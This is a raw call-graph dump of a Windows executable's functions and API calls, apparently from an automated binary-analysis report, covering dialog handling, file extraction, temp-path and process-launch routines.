calls 2 library calls 26550->27107 26551->26529 26557 7ff65594bcd6 SetDlgItemTextW 26552->26557 26566 7ff65592129c 33 API calls 26553->26566 26561 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26556->26561 26560 7ff65593aae0 48 API calls 26557->26560 26559 7ff65594b537 26564 7ff65593aae0 48 API calls 26559->26564 26565 7ff65594bd08 26560->26565 26567 7ff65594c368 26561->26567 26569 7ff65594b555 26564->26569 26578 7ff65592129c 33 API calls 26565->26578 26570 7ff65594b498 26566->26570 26571 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26567->26571 26574 7ff65593da98 48 API calls 26569->26574 26866 7ff65594f0a4 26570->26866 26580 7ff65594c36e 26571->26580 26584 7ff65594b568 26574->26584 26607 7ff65594bd31 26578->26607 26591 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26580->26591 26587 7ff65594f0a4 24 API calls 26584->26587 26588 7ff65594b578 26587->26588 26595 7ff655921fa0 31 API calls 26588->26595 26590 7ff65594bdda 26599 7ff65593aae0 48 API calls 26590->26599 26601 7ff65594c374 26591->26601 26605 7ff65594b586 26595->26605 26598 7ff65594b5ec 26610 7ff65594b61a 26598->26610 27109 7ff6559332a8 26598->27109 26612 7ff65594bde4 26599->26612 26600 7ff65594b4e8 26600->26598 27108 7ff65594fa80 33 API calls 2 library calls 26600->27108 26618 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26601->26618 26605->26580 26605->26600 26607->26590 26619 7ff65592129c 33 API calls 26607->26619 26880 7ff655932f58 26610->26880 26630 7ff65592129c 33 API calls 26612->26630 26624 7ff65594c37a 26618->26624 26625 7ff65594bd7f 26619->26625 26636 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26624->26636 26632 7ff65593aae0 48 API calls 26625->26632 26628 7ff65594b64c 26640 7ff655937fc4 SetCurrentDirectoryW 26628->26640 26629 7ff65594b634 GetLastError 26629->26628 26635 7ff65594be0d 26630->26635 26637 7ff65594bd8a 26632->26637 26634 7ff65594b60e 27112 7ff655949d90 12 API calls _handle_error 26634->27112 26650 7ff65592129c 33 API calls 26635->26650 26641 7ff65594c380 26636->26641 26643 7ff655921150 33 API calls 26637->26643 26645 7ff65594b65e 26640->26645 26651 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26641->26651 26646 7ff65594bda2 26643->26646 26648 7ff65594b674 26645->26648 26649 7ff65594b665 GetLastError 26645->26649 26656 7ff655922034 33 API calls 26646->26656 26657 7ff65594b72b 26648->26657 26658 7ff65594b68b GetTickCount 26648->26658 26745 7ff65594b71c 26648->26745 26649->26648 26654 7ff65594be4e 26650->26654 26655 7ff65594c386 26651->26655 26653->26506 26665 7ff655921fa0 31 API calls 26654->26665 26659 7ff65592255c 61 API calls 26655->26659 26660 7ff65594bdbe 26656->26660 26661 7ff65594ba50 26657->26661 26669 7ff655936454 34 API calls 26657->26669 26892 7ff655924228 26658->26892 26663 7ff65594c3e4 26659->26663 26668 7ff655921fa0 31 API calls 26660->26668 26671 7ff65594b3b1 EndDialog 26661->26671 27121 7ff65592bd0c 33 API calls 26661->27121 26666 7ff65594c3e8 26663->26666 26675 7ff65594c3fd 26663->26675 26676 7ff65594c489 GetDlgItem SetFocus 26663->26676 26674 7ff65594be78 26665->26674 26684 7ff655952320 _handle_error 8 API calls 26666->26684 26678 7ff65594bdcc 26668->26678 26679 7ff65594b74e 26669->26679 26671->26536 26672 7ff65594bb79 26690 7ff65593aae0 48 API calls 26672->26690 26673 7ff65594ba75 27122 7ff655921150 26673->27122 26683 7ff655921fa0 31 API calls 26674->26683 26675->26666 26699 7ff65594c434 SendDlgItemMessageW 26675->26699 26688 7ff65594c4ba 26676->26688 26686 7ff655921fa0 31 API calls 26678->26686 27113 7ff65593b914 102 API calls 26679->27113 26681 7ff65594b6ba 26689 7ff655921fa0 31 API calls 26681->26689 26692 7ff65594be83 26683->26692 26693 7ff65594ca97 26684->26693 26686->26590 26701 7ff65592129c 33 API calls 26688->26701 26695 7ff65594b6c8 26689->26695 26696 7ff65594bba7 SetDlgItemTextW 26690->26696 26691 7ff65594ba8a 26697 7ff65593aae0 48 API calls 26691->26697 26698 7ff655921fa0 31 API calls 26692->26698 26694 7ff65594b768 26700 7ff65593da98 48 API calls 26694->26700 26902 7ff655932134 26695->26902 26702 7ff655922534 26696->26702 26703 7ff65594ba97 26697->26703 26698->26536 26704 7ff65594c45d EndDialog 26699->26704 26709 7ff65594c454 26699->26709 26705 7ff65594b7aa GetCommandLineW 26700->26705 26706 7ff65594c4cc 26701->26706 26707 7ff65594bbc5 SetDlgItemTextW GetDlgItem 26702->26707 26708 7ff655921150 33 API calls 26703->26708 26704->26666 26710 7ff65594b869 26705->26710 26711 7ff65594b84f 26705->26711 27127 7ff6559380d8 33 API calls 26706->27127 26714 7ff65594bc13 26707->26714 26715 7ff65594bbf0 GetWindowLongPtrW SetWindowLongPtrW 26707->26715 26716 7ff65594baaa 26708->26716 26709->26704 27114 7ff65594ab54 33 API calls _handle_error 26710->27114 26728 7ff6559220b0 33 API calls 26711->26728 26918 7ff65594ce88 26714->26918 26715->26714 26721 7ff655921fa0 31 API calls 26716->26721 26717 7ff65594c4e0 26722 7ff65592250c SetDlgItemTextW 26717->26722 26727 7ff65594bab5 26721->26727 26729 7ff65594c4f4 26722->26729 26723 7ff65594b87a 27115 7ff65594ab54 33 API calls _handle_error 26723->27115 26724 7ff65594b704 26731 7ff65593204c 100 API calls 26724->26731 26725 7ff65594b6f5 GetLastError 26725->26724 26733 7ff655921fa0 31 API calls 26727->26733 26728->26710 26739 7ff65594c526 SendDlgItemMessageW FindFirstFileW 26729->26739 26736 7ff65594b711 26731->26736 26732 7ff65594ce88 163 API calls 26737 7ff65594bc3c 26732->26737 26738 7ff65594bac3 26733->26738 26734 7ff65594b88b 27116 7ff65594ab54 33 API calls _handle_error 26734->27116 26741 7ff655921fa0 31 API calls 26736->26741 27069 7ff65594f974 26737->27069 26750 7ff65593aae0 48 API calls 26738->26750 26743 7ff65594c57b 26739->26743 26837 7ff65594ca04 26739->26837 26740 7ff65594b89c 27117 7ff65593b9b4 102 API calls 26740->27117 26741->26745 26751 7ff65593aae0 48 API calls 26743->26751 26745->26657 26745->26672 26747 7ff65594b8b3 27118 7ff65594fbdc 33 API calls 26747->27118 26748 7ff65594ca81 26748->26666 26749 7ff65594ce88 163 API calls 26764 7ff65594bc6a 26749->26764 26754 7ff65594badb 26750->26754 26755 7ff65594c59e 26751->26755 26753 7ff65594caa9 26757 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26753->26757 26765 7ff65592129c 33 API calls 26754->26765 26767 7ff65592129c 33 API calls 26755->26767 26756 7ff65594b8d2 CreateFileMappingW 26759 7ff65594b953 ShellExecuteExW 26756->26759 26760 7ff65594b911 MapViewOfFile 26756->26760 26761 7ff65594caae 26757->26761 26758 7ff65594bc96 27126 7ff655922298 GetDlgItem EnableWindow 26758->27126 26773 7ff65594b974 26759->26773 27119 7ff655953640 26760->27119 26768 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26761->26768 26764->26758 26769 7ff65594ce88 163 API calls 26764->26769 26778 7ff65594bb04 26765->26778 26766 7ff65594b3f5 26766->26547 26766->26671 26770 7ff65594c5cd 26767->26770 26771 7ff65594cab4 26768->26771 26769->26758 26772 7ff655921150 33 API calls 26770->26772 26777 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26771->26777 26774 7ff65594c5e8 26772->26774 26775 7ff65594b996 WaitForInputIdle 26773->26775 26776 7ff65594b9c3 26773->26776 26780 7ff65592e164 33 API calls 26774->26780 26781 7ff65594b9ab 26775->26781 26786 7ff65594b9dc UnmapViewOfFile CloseHandle 26776->26786 26787 7ff65594b9ef 26776->26787 26782 7ff65594caba 26777->26782 26778->26624 26779 7ff65594bb5a 26778->26779 26783 7ff655921fa0 31 API calls 26779->26783 26784 7ff65594c5ff 26780->26784 26781->26776 26785 7ff65594b9b1 Sleep 26781->26785 26790 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26782->26790 26783->26671 26788 7ff655921fa0 31 API calls 26784->26788 26785->26776 26785->26781 26786->26787 26787->26601 26789 7ff65594ba25 26787->26789 26791 7ff65594c60c 26788->26791 26793 7ff655921fa0 31 API calls 26789->26793 26792 7ff65594cac0 26790->26792 26791->26761 26795 7ff655921fa0 31 API calls 26791->26795 26796 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26792->26796 26794 7ff65594ba42 26793->26794 26797 7ff655921fa0 31 API calls 26794->26797 26798 7ff65594c673 26795->26798 26799 7ff65594cac6 26796->26799 26797->26661 26800 7ff65592250c SetDlgItemTextW 26798->26800 26802 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26799->26802 26801 7ff65594c687 FindClose 26800->26801 26803 7ff65594c797 SendDlgItemMessageW 26801->26803 26804 7ff65594c6a3 26801->26804 26805 7ff65594cacc 26802->26805 26806 7ff65594c7cb 26803->26806 27128 7ff65594a2cc 10 API calls _handle_error 26804->27128 26809 7ff65593aae0 48 API calls 26806->26809 26808 7ff65594c6c6 26810 7ff65593aae0 48 API calls 26808->26810 26811 7ff65594c7d8 26809->26811 26812 7ff65594c6cf 26810->26812 26814 7ff65592129c 33 API calls 26811->26814 26813 7ff65593da98 48 API calls 26812->26813 26817 7ff65594c6ec memcpy_s 26813->26817 26816 7ff65594c807 26814->26816 26815 7ff655921fa0 31 API calls 26818 7ff65594c783 26815->26818 26819 7ff655921150 33 API calls 26816->26819 26817->26771 26817->26815 26820 7ff65592250c SetDlgItemTextW 26818->26820 26821 7ff65594c822 26819->26821 26820->26803 26822 7ff65592e164 33 API calls 26821->26822 26823 7ff65594c839 26822->26823 26824 7ff655921fa0 31 API calls 26823->26824 26825 7ff65594c845 memcpy_s 26824->26825 26826 7ff655921fa0 31 API calls 26825->26826 26827 7ff65594c87f 26826->26827 26828 7ff655921fa0 31 API calls 26827->26828 26829 7ff65594c88c 26828->26829 26829->26782 26830 7ff655921fa0 31 API calls 26829->26830 26831 7ff65594c8f3 26830->26831 26832 7ff65592250c SetDlgItemTextW 26831->26832 26833 7ff65594c907 26832->26833 26833->26837 27129 7ff65594a2cc 10 API calls _handle_error 26833->27129 26835 7ff65594c932 26836 7ff65593aae0 48 API calls 26835->26836 26838 7ff65594c93c 26836->26838 26837->26666 26837->26748 26837->26753 26837->26799 26839 7ff65593da98 48 API calls 26838->26839 26841 7ff65594c959 memcpy_s 26839->26841 26840 7ff655921fa0 31 API calls 26842 7ff65594c9f0 26840->26842 26841->26792 26841->26840 26843 7ff65592250c SetDlgItemTextW 26842->26843 26843->26837 26845 7ff65592256a 26844->26845 26846 7ff6559225d0 26844->26846 26845->26846 27130 7ff65593a4ac 26845->27130 26846->26501 26848 7ff65592258f 26848->26846 26849 7ff6559225a4 GetDlgItem 26848->26849 26849->26846 26850 7ff6559225b7 26849->26850 26850->26846 26851 7ff6559225be SetDlgItemTextW 26850->26851 26851->26846 26853 7ff655922334 26852->26853 26855 7ff6559222fc 26852->26855 27179 7ff6559223f8 GetWindowTextLengthW 26853->27179 26856 7ff65592129c 33 API calls 26855->26856 26857 7ff65592232a memcpy_s 26856->26857 26858 7ff655921fa0 31 API calls 26857->26858 26861 7ff655922389 26857->26861 26858->26861 26859 7ff6559223c8 26860 7ff655952320 _handle_error 8 API calls 26859->26860 26862 7ff6559223dd 26860->26862 26861->26859 26863 7ff6559223f0 26861->26863 26862->26528 26862->26671 26862->26766 26864 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26863->26864 26865 7ff6559223f5 26864->26865 27191 7ff65594ae1c PeekMessageW 26866->27191 26869 7ff65594f143 IsDlgButtonChecked IsDlgButtonChecked 26871 7ff65594f189 26869->26871 26872 7ff65594f1a4 IsDlgButtonChecked 26869->26872 26870 7ff65594f0f5 26875 7ff65594f101 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 26870->26875 26871->26872 26873 7ff65594f1c6 IsDlgButtonChecked IsDlgButtonChecked 26872->26873 26874 7ff65594f1c3 26872->26874 26876 7ff65594f218 IsDlgButtonChecked 26873->26876 26877 7ff65594f1f3 IsDlgButtonChecked 26873->26877 26874->26873 26875->26869 26878 7ff655952320 _handle_error 8 API calls 26876->26878 26877->26876 26879 7ff65594b4a5 26878->26879 26879->26567 26879->26600 26881 7ff65593309d 26880->26881 26885 7ff655932f8e 26880->26885 26882 7ff655952320 _handle_error 8 API calls 26881->26882 26883 7ff6559330b3 26882->26883 26883->26628 26883->26629 26884 7ff655933077 26884->26881 26886 7ff655933684 56 API calls 26884->26886 26885->26884 26887 7ff65592129c 33 API calls 26885->26887 26889 7ff6559330c8 26885->26889 27196 7ff655933684 26885->27196 26886->26881 26887->26885 26890 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26889->26890 26891 7ff6559330cd 26890->26891 26893 7ff655924255 26892->26893 26894 7ff65592426a 26893->26894 26895 7ff65592129c 33 API calls 26893->26895 26896 7ff655952320 _handle_error 8 API calls 26894->26896 26895->26894 26897 7ff6559242a1 26896->26897 26898 7ff655923c84 26897->26898 26899 7ff655923cab 26898->26899 27230 7ff65592710c 26899->27230 26901 7ff655923cbb memcpy_s 26901->26681 26905 7ff65593216a 26902->26905 26903 7ff65593219e 26906 7ff65593227f 26903->26906 26907 7ff655936a0c 49 API calls 26903->26907 26904 7ff6559321b1 CreateFileW 26904->26903 26905->26903 26905->26904 26908 7ff6559322af 26906->26908 26913 7ff6559220b0 33 API calls 26906->26913 26909 7ff655932209 26907->26909 26910 7ff655952320 _handle_error 8 API calls 26908->26910 26911 7ff655932246 26909->26911 26912 7ff65593220d CreateFileW 26909->26912 26914 7ff6559322c4 26910->26914 26911->26906 26915 7ff6559322d8 26911->26915 26912->26911 26913->26908 26914->26724 26914->26725 26916 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26915->26916 26917 7ff6559322dd 26916->26917 27242 7ff65594aa08 26918->27242 26920 7ff65594d1ee 26921 7ff655921fa0 31 API calls 26920->26921 26922 7ff65594d1f7 26921->26922 26924 7ff655952320 _handle_error 8 API calls 26922->26924 26923 7ff65593d22c 33 API calls 27039 7ff65594cf03 memcpy_s 26923->27039 26925 7ff65594bc2b 26924->26925 26925->26732 26926 7ff65594eefa 27330 7ff65592704c 47 API calls memcpy_s 26926->27330 26929 7ff65594ef00 27331 7ff65592704c 47 API calls memcpy_s 26929->27331 26931 7ff65594ef06 26935 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26931->26935 26933 7ff65594eeee 26934 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26933->26934 26936 7ff65594eef4 26934->26936 26938 7ff65594ef0c 26935->26938 27329 7ff65592704c 47 API calls memcpy_s 26936->27329 26940 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26938->26940 26942 7ff65594ef12 26940->26942 26941 7ff65594ee4a 26943 7ff65594eed2 26941->26943 26944 7ff6559220b0 33 API calls 26941->26944 26947 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26942->26947 27327 7ff655921f80 33 API calls 3 library calls 26943->27327 26949 7ff65594ee77 26944->26949 26945 7ff65594eee8 27328 7ff655922004 33 API calls std::_Xinvalid_argument 26945->27328 26946 7ff6559213a4 33 API calls 26950 7ff65594dc3a GetTempPathW 26946->26950 26951 7ff65594ef18 26947->26951 27326 7ff65594abe8 33 API calls 3 library calls 26949->27326 26950->27039 26959 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26951->26959 26952 7ff6559362dc 35 API calls 26952->27039 26957 7ff65594ee8d 26964 7ff655921fa0 31 API calls 26957->26964 26968 7ff65594eea4 memcpy_s 26957->26968 26958 7ff655922520 SetDlgItemTextW 26958->27039 26962 7ff65594ef1e 26959->26962 26961 7ff65595bb8c 43 API calls 26961->27039 26966 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26962->26966 26963 7ff65594e7f3 26963->26943 26963->26945 26967 7ff6559521d0 33 API calls 26963->26967 26975 7ff65594e83b memcpy_s 26963->26975 26964->26968 26965 7ff655921fa0 31 API calls 26965->26943 26969 7ff65594ef24 26966->26969 26967->26975 26968->26965 26974 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26969->26974 26971 7ff65594aa08 33 API calls 26971->27039 26972 7ff6559220b0 33 API calls 26972->27039 26973 7ff65594ef6c 27334 7ff655922004 33 API calls std::_Xinvalid_argument 26973->27334 26979 7ff65594ef2a 26974->26979 26983 7ff6559220b0 33 API calls 26975->26983 27026 7ff65594eb8f 26975->27026 26977 7ff655921fa0 31 API calls 26977->26941 26978 7ff65594ef78 27336 7ff655922004 33 API calls std::_Xinvalid_argument 26978->27336 26988 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26979->26988 26980 7ff65594ef72 27335 7ff655921f80 33 API calls 3 library calls 26980->27335 26982 7ff65594ef66 27333 7ff655921f80 33 API calls 3 library calls 26982->27333 26989 7ff65594e963 26983->26989 26987 7ff65594ec2a 26987->26973 26987->26982 26996 7ff65594ec72 memcpy_s 26987->26996 27001 7ff65594ed3b memcpy_s 26987->27001 27003 7ff6559521d0 33 API calls 26987->27003 26993 7ff65594ef30 26988->26993 26994 7ff65594ef60 26989->26994 27002 7ff65592129c 33 API calls 26989->27002 26992 7ff65594ed40 26992->26978 26992->26980 26992->27001 27006 7ff6559521d0 33 API calls 26992->27006 27007 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26993->27007 27332 7ff65592704c 47 API calls memcpy_s 26994->27332 26995 7ff655933d34 51 API calls 26995->27039 27247 7ff65594f4e0 26996->27247 26998 7ff65594d5e9 GetDlgItem 27005 7ff655922520 SetDlgItemTextW 26998->27005 27001->26977 27008 7ff65594e9a6 27002->27008 27003->26996 27009 7ff65594d608 IsDlgButtonChecked 27005->27009 27006->27001 27012 7ff65594ef36 27007->27012 27322 7ff65593d22c 27008->27322 27009->27039 27010 7ff65593dc2c 33 API calls 27010->27039 27011 7ff655922674 31 API calls 27011->27039 27016 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27012->27016 27015 7ff655935b60 53 API calls 27015->27039 27020 7ff65594ef3c 27016->27020 27017 7ff65594d63c IsDlgButtonChecked 27017->27039 27019 7ff655933f30 54 API calls 27019->27039 27024 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27020->27024 27023 7ff65594e9d1 27023->27026 27038 7ff65594ef48 27023->27038 27045 7ff65594ef4e 27023->27045 27053 7ff655921fa0 31 API calls 27023->27053 27054 7ff65592129c 33 API calls 27023->27054 27056 7ff6559413c4 CompareStringW 27023->27056 27060 7ff65593d22c 33 API calls 27023->27060 27028 7ff65594ef42 27024->27028 27026->26987 27026->26992 27029 7ff65594ef5a 27026->27029 27052 7ff65594ef54 27026->27052 27027 7ff655921fa0 31 API calls 27027->27039 27035 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27028->27035 27034 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27029->27034 27030 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27030->27029 27031 7ff655924228 33 API calls 27031->27039 27032 7ff65594d95e SHFileOperationW 27032->27039 27033 7ff655921744 33 API calls 27033->27032 27034->26994 27035->27038 27036 7ff655935820 33 API calls 27036->27039 27037 7ff6559332a8 51 API calls 27037->27039 27043 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27038->27043 27039->26920 27039->26923 27039->26926 27039->26929 27039->26931 27039->26933 27039->26936 27039->26938 27039->26941 27039->26942 27039->26946 27039->26951 27039->26952 27039->26958 27039->26961 27039->26962 27039->26963 27039->26969 27039->26971 27039->26972 27039->26979 27039->26993 27039->26995 27039->27010 27039->27011 27039->27012 27039->27015 27039->27017 27039->27019 27039->27020 27039->27027 27039->27028 27039->27031 27039->27032 27039->27033 27039->27036 27039->27037 27040 7ff655935aa8 33 API calls 27039->27040 27041 7ff655928d04 33 API calls 27039->27041 27042 7ff65592e164 33 API calls 27039->27042 27044 7ff65592250c SetDlgItemTextW 27039->27044 27047 7ff655937df4 47 API calls 27039->27047 27048 7ff655921150 33 API calls 27039->27048 27050 7ff6559499c8 31 API calls 27039->27050 27057 7ff65594df99 EndDialog 27039->27057 27059 7ff6559332bc 51 API calls 27039->27059 27061 7ff65594db21 MoveFileW 27039->27061 27064 7ff65592129c 33 API calls 27039->27064 27066 7ff655932f58 56 API calls 27039->27066 27067 7ff655922034 33 API calls 27039->27067 27246 7ff6559413c4 CompareStringW 27039->27246 27286 7ff65593cfa4 35 API calls _invalid_parameter_noinfo_noreturn 27039->27286 27287 7ff6559495b4 33 API calls Concurrency::cancel_current_task 27039->27287 27288 7ff655950684 31 API calls _invalid_parameter_noinfo_noreturn 27039->27288 27289 7ff65592df4c 47 API calls memcpy_s 27039->27289 27290 7ff65594a834 33 API calls _invalid_parameter_noinfo_noreturn 27039->27290 27291 7ff655949518 33 API calls 27039->27291 27292 7ff65594a440 116 API calls 2 library calls 27039->27292 27293 7ff65594abe8 33 API calls 3 library calls 27039->27293 27294 7ff655937368 33 API calls 2 library calls 27039->27294 27295 7ff655934088 33 API calls 27039->27295 27296 7ff6559365b0 33 API calls 3 library calls 27039->27296 27297 7ff6559372cc 27039->27297 27301 7ff6559331bc 27039->27301 27315 7ff655933ea0 FindClose 27039->27315 27316 7ff6559413f4 CompareStringW 27039->27316 27317 7ff655949cd0 47 API calls 27039->27317 27318 7ff6559487d8 51 API calls 3 library calls 27039->27318 27319 7ff65594ab54 33 API calls _handle_error 27039->27319 27320 7ff655935b08 CompareStringW 27039->27320 27321 7ff655937eb0 47 API calls 27039->27321 27040->27039 27041->27039 27042->27039 27043->27045 27044->27039 27049 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27045->27049 27047->27039 27048->27039 27049->27052 27050->27039 27052->27030 27053->27023 27054->27023 27056->27023 27057->27039 27059->27039 27060->27023 27062 7ff65594db55 MoveFileExW 27061->27062 27063 7ff65594db70 27061->27063 27062->27063 27063->27039 27065 7ff655921fa0 31 API calls 27063->27065 27064->27039 27065->27063 27066->27039 27067->27039 27070 7ff65594f9a3 27069->27070 27071 7ff6559220b0 33 API calls 27070->27071 27072 7ff65594f9b9 27071->27072 27073 7ff65594f9ee 27072->27073 27074 7ff6559220b0 33 API calls 27072->27074 27344 7ff65592e34c 27073->27344 27074->27073 27076 7ff65594fa4b 27364 7ff65592e7a8 27076->27364 27080 7ff65594fa61 27081 7ff655952320 _handle_error 8 API calls 27080->27081 27082 7ff65594bc52 27081->27082 27082->26749 27084 7ff65594849c 4 API calls 27083->27084 27085 7ff65594f3bf 27084->27085 27086 7ff65594f4b7 27085->27086 27087 7ff65594f3c7 GetWindow 27085->27087 27088 7ff655952320 _handle_error 8 API calls 27086->27088 27092 7ff65594f3e2 27087->27092 27089 7ff65594be9b 27088->27089 27089->26510 27089->26511 27090 7ff65594f3ee GetClassNameW 28322 7ff6559413c4 CompareStringW 27090->28322 27092->27086 27092->27090 27093 7ff65594f496 GetWindow 27092->27093 27094 7ff65594f417 GetWindowLongPtrW 27092->27094 27093->27086 27093->27092 27094->27093 27095 7ff65594f429 IsDlgButtonChecked 27094->27095 27095->27093 27096 7ff65594f445 GetObjectW 27095->27096 28323 7ff655948504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27096->28323 27098 7ff65594f461 27099 7ff6559484cc 4 API calls 27098->27099 28324 7ff655948df4 16 API calls _handle_error 27098->28324 27099->27098 27101 7ff65594f479 IsDlgButtonChecked DeleteObject 27101->27093 27103 7ff655922527 27102->27103 27104 7ff65592252a SetDlgItemTextW 27102->27104 27103->27104 27105 7ff65598e2e0 27104->27105 27106->26532 27107->26559 27108->26598 27110 7ff6559332bc 51 API calls 27109->27110 27111 7ff6559332b1 27110->27111 27111->26610 27111->26634 27112->26610 27113->26694 27114->26723 27115->26734 27116->26740 27117->26747 27118->26756 27120 7ff655953620 27119->27120 27120->26759 27120->27120 27121->26673 27123 7ff655921177 27122->27123 27124 7ff655922034 33 API calls 27123->27124 27125 7ff655921185 memcpy_s 27124->27125 27125->26691 27127->26717 27128->26808 27129->26835 27131 7ff655933e28 swprintf 46 API calls 27130->27131 27132 7ff65593a509 27131->27132 27133 7ff655940f68 WideCharToMultiByte 27132->27133 27139 7ff65593a519 27133->27139 27134 7ff65593a589 27155 7ff655939408 27134->27155 27137 7ff65593a603 27142 7ff65593a60c GetWindowLongPtrW 27137->27142 27143 7ff65593a6c2 27137->27143 27138 7ff65593a6f2 GetSystemMetrics GetWindow 27140 7ff65593a71d 27138->27140 27141 7ff65593a821 27138->27141 27139->27134 27147 7ff655939800 31 API calls 27139->27147 27153 7ff65593a56a SetDlgItemTextW 27139->27153 27140->27141 27151 7ff65593a73e GetWindowRect 27140->27151 27154 7ff65593a800 GetWindow 27140->27154 27144 7ff655952320 _handle_error 8 API calls 27141->27144 27145 7ff65598e2c0 27142->27145 27170 7ff6559395a8 27143->27170 27148 7ff65593a830 27144->27148 27149 7ff65593a6aa GetWindowRect 27145->27149 27147->27139 27148->26848 27149->27143 27151->27140 27152 7ff65593a6e5 SetDlgItemTextW 27152->27138 27153->27139 27154->27140 27154->27141 27156 7ff6559395a8 47 API calls 27155->27156 27158 7ff65593944f 27156->27158 27157 7ff655952320 _handle_error 8 API calls 27159 7ff65593958e GetWindowRect GetClientRect 27157->27159 27160 7ff65592129c 33 API calls 27158->27160 27168 7ff65593955a 27158->27168 27159->27137 27159->27138 27161 7ff65593949c 27160->27161 27162 7ff6559395a1 27161->27162 27164 7ff65592129c 33 API calls 27161->27164 27163 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27162->27163 27165 7ff6559395a7 27163->27165 27166 7ff655939514 27164->27166 27167 7ff65593959c 27166->27167 27166->27168 27169 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27167->27169 27168->27157 27169->27162 27171 7ff655933e28 swprintf 46 API calls 27170->27171 27172 7ff6559395eb 27171->27172 27173 7ff655940f68 WideCharToMultiByte 27172->27173 27174 7ff655939603 27173->27174 27175 7ff655939800 31 API calls 27174->27175 27176 7ff65593961b 27175->27176 27177 7ff655952320 _handle_error 8 API calls 27176->27177 27178 7ff65593962b 27177->27178 27178->27138 27178->27152 27180 7ff6559213a4 33 API calls 27179->27180 27181 7ff655922462 GetWindowTextW 27180->27181 27182 7ff655922494 27181->27182 27183 7ff65592129c 33 API calls 27182->27183 27184 7ff6559224a2 27183->27184 27185 7ff6559224dd 27184->27185 27187 7ff655922505 27184->27187 27186 7ff655952320 _handle_error 8 API calls 27185->27186 27188 7ff6559224f3 27186->27188 27189 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27187->27189 27188->26857 27190 7ff65592250a 27189->27190 27192 7ff65594ae3c GetMessageW 27191->27192 27193 7ff65594ae80 GetDlgItem 27191->27193 27194 7ff65594ae6a TranslateMessage DispatchMessageW 27192->27194 27195 7ff65594ae5b IsDialogMessageW 27192->27195 27193->26869 27193->26870 27194->27193 27195->27193 27195->27194 27198 7ff6559336b3 27196->27198 27197 7ff6559336e0 27200 7ff6559332bc 51 API calls 27197->27200 27198->27197 27199 7ff6559336cc CreateDirectoryW 27198->27199 27199->27197 27201 7ff65593377d 27199->27201 27202 7ff6559336ee 27200->27202 27204 7ff65593378d 27201->27204 27216 7ff655933d34 27201->27216 27203 7ff655933791 GetLastError 27202->27203 27205 7ff655936a0c 49 API calls 27202->27205 27203->27204 27208 7ff655952320 _handle_error 8 API calls 27204->27208 27207 7ff65593371c 27205->27207 27209 7ff65593373b 27207->27209 27210 7ff655933720 CreateDirectoryW 27207->27210 27211 7ff6559337b9 27208->27211 27212 7ff655933774 27209->27212 27213 7ff6559337ce 27209->27213 27210->27209 27211->26885 27212->27201 27212->27203 27214 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27213->27214 27215 7ff6559337d3 27214->27215 27217 7ff655933d5b 27216->27217 27218 7ff655933d5e SetFileAttributesW 27216->27218 27217->27218 27219 7ff655933df5 27218->27219 27220 7ff655933d74 27218->27220 27221 7ff655952320 _handle_error 8 API calls 27219->27221 27222 7ff655936a0c 49 API calls 27220->27222 27223 7ff655933e0a 27221->27223 27224 7ff655933d99 27222->27224 27223->27204 27225 7ff655933dbc 27224->27225 27226 7ff655933d9d SetFileAttributesW 27224->27226 27225->27219 27227 7ff655933e1a 27225->27227 27226->27225 27228 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27227->27228 27229 7ff655933e1f 27228->27229 27231 7ff655927206 27230->27231 27232 7ff65592713b 27230->27232 27240 7ff65592704c 47 API calls memcpy_s 27231->27240 27238 7ff65592714b memcpy_s 27232->27238 27239 7ff655923f48 33 API calls 2 library calls 27232->27239 27235 7ff65592720b 27236 7ff655927273 27235->27236 27241 7ff65592889c 8 API calls memcpy_s 27235->27241 27236->26901 27238->26901 27239->27238 27240->27235 27241->27235 27243 7ff65594aa2f 27242->27243 27244 7ff65594aa36 27242->27244 27243->27039 27244->27243 27245 7ff655921744 33 API calls 27244->27245 27245->27244 27246->27039 27252 7ff65594f529 memcpy_s 27247->27252 27263 7ff65594f87d 27247->27263 27248 7ff655921fa0 31 API calls 27249 7ff65594f89c 27248->27249 27250 7ff655952320 _handle_error 8 API calls 27249->27250 27251 7ff65594f8a8 27250->27251 27251->27001 27253 7ff65594f684 27252->27253 27337 7ff6559413c4 CompareStringW 27252->27337 27255 7ff65592129c 33 API calls 27253->27255 27256 7ff65594f6c0 27255->27256 27257 7ff6559332a8 51 API calls 27256->27257 27258 7ff65594f6ca 27257->27258 27259 7ff655921fa0 31 API calls 